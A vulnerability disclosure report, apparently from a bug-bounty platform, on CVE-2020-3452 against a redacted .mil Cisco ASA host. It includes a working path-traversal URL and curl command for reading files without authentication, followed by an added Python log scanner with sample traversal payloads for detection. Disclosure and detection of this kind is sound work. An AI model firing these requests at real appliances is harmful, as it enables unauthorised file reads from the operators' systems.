[CVE-2020-3452] Unauthenticated file read in Cisco ASA
High
## Vulnerability Details
Hey,
I found out that host `████████.mil` was vulnerable to CVE-2020-3452.
You can test it by visiting the URL:
```
https://██████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
```
To try it with curl, please run the following command:
```
curl -i -s -k -X $'GET' \
-H $'Host: ███████.mil' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
$'https://████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
```
███████
Reference:
* https://www.secpod.com/blog/cve-2020-3452-affecting-85000-cisco-asa-ftd-devices/
* https://twitter.com/aboul3la/status/1286012324722155525
## Impact
Anyone can read any file present on the server.
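For defenders, the request shape in this report is easy to hunt for in web-proxy or WAF logs sitting in front of the VPN appliance: a request to a `/+CSCOT+/` endpoint whose query parameters carry a `..` path segment (the report's `platform=..&resource-type=..`). The script below is an added example, not part of the report or of any Cisco tooling; it assumes combined-format access log lines (constructed here for the demonstration) and flags requests where any query parameter decodes to a traversal segment, including single- and double-URL-encoded dots.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (combined log format), not taken from the report.
# Lines 1 and 4 mirror the traversal pattern described above; 2 and 3 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2020:10:01:02 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 5123
10.0.0.6 - - [23/Jul/2020:10:01:05 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 812
10.0.0.7 - - [23/Jul/2020:10:02:11 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=win&resource-type=logo&name=logo.png HTTP/1.1" 200 2048
10.0.0.8 - - [23/Jul/2020:10:03:40 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=%2e%2e&resource-type=%2E%2E&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 5123
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A '..' standing alone as a path segment (start/end of value or between slashes).
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.($|[/\\])')

# Only the unauthenticated customization/translation handlers live under this prefix.
WATCHED_PREFIX = '/+CSCOT+/'


def is_traversal(value: str) -> bool:
    """True if a query value contains a '..' segment after (double) URL decoding."""
    decoded = unquote(unquote(value))  # second unquote catches %252e style encoding
    return bool(TRAVERSAL_RE.search(decoded))


def analyse_target(target: str):
    """Return the names of query parameters carrying traversal, or None if clean."""
    parts = urlsplit(target)
    if not parts.path.startswith(WATCHED_PREFIX):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = [name for name, value in params if is_traversal(value)]
    return hits or None


def scan_log(text: str):
    """Scan log text line by line; return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash the scan
        hits = analyse_target(m.group('target'))
        if hits:
            findings.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'status': int(m.group('status')),
                'params': sorted(hits),
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} traversal in {f['params']}")
```

A status of 200 on a flagged line is the signal that matters most: it indicates the appliance served the traversal request rather than rejecting it, so those sources and timestamps should be prioritised for incident review and the device checked against the fixed versions in Cisco's advisory.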
Report Stats
- Report ID: 951530
- State: Closed
- Substate: resolved
- Upvotes: 4